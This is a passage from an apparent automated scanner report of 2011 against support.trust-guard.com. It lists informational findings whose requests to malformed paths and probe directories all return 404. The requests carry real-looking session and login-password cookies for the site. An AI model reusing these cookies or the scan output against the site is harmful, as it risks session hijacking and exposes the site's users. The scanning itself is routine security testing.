Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/supportsuite.gif/

Request

GET /themes/client_default/supportsuite.gif/ HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:37:14 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2330
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.69. https://support.trust-guard.com/visitor/%22https:/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/

Request

GET /visitor/%22https:/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:19 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.70. https://support.trust-guard.com/visitor/%22https:/Netsparkerd90cb1409e394c5fbfcd68771660fcc7/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/Netsparkerd90cb1409e394c5fbfcd68771660fcc7/

Request

GET /visitor/%22https:/Netsparkerd90cb1409e394c5fbfcd68771660fcc7/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:38 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.71. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/

Request

GET /visitor/%22https:/support.trust-guard.com/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.72. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/Netsparker35d5c6040fcc4e7b8e79ab19b001e63a/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/Netsparker35d5c6040fcc4e7b8e79ab19b001e63a/

Request

GET /visitor/%22https:/support.trust-guard.com/Netsparker35d5c6040fcc4e7b8e79ab19b001e63a/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:19 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.73. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:07 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.74. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/Netsparker066842aac8ac4674a195d22e23aa9498/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/Netsparker066842aac8ac4674a195d22e23aa9498/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/Netsparker066842aac8ac4674a195d22e23aa9498/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.75. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:00 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.76. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/Netsparkerb9766c5d4f4b40c78bd633a6258c8ad9/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/Netsparkerb9766c5d4f4b40c78bd633a6258c8ad9/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/Netsparkerb9766c5d4f4b40c78bd633a6258c8ad9/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:05 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.77. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:58 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.78. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparker2924845846cb47428b498a00675854c1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparker2924845846cb47428b498a00675854c1/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparker2924845846cb47428b498a00675854c1/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:07 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.79. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:11 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.80. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker6f8152c81ee24b75acd643f8e28958ab/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker6f8152c81ee24b75acd643f8e28958ab/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker6f8152c81ee24b75acd643f8e28958ab/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:24 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.81. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:04:58 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.82. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerd9a591c7ccd84cd695c74b212014b334/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerd9a591c7ccd84cd695c74b212014b334/

Request

GET /visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerd9a591c7ccd84cd695c74b212014b334/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:05:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.83. https://support.trust-guard.com/visitor/%22javascript:closeProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:closeProactiveRequest_vvx8pjmw()

Request

GET /visitor/%22javascript:closeProactiveRequest_vvx8pjmw();/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor//%22javascript:closeProactiveRequest_vvx8pjmw();/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:47 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2299
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.84. https://support.trust-guard.com/visitor/%22javascript:doProactiveRequest_vvx8pjmw()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/%22javascript:doProactiveRequest_vvx8pjmw()

Request

GET /visitor/%22javascript:doProactiveRequest_vvx8pjmw();/ HTTP/1.1
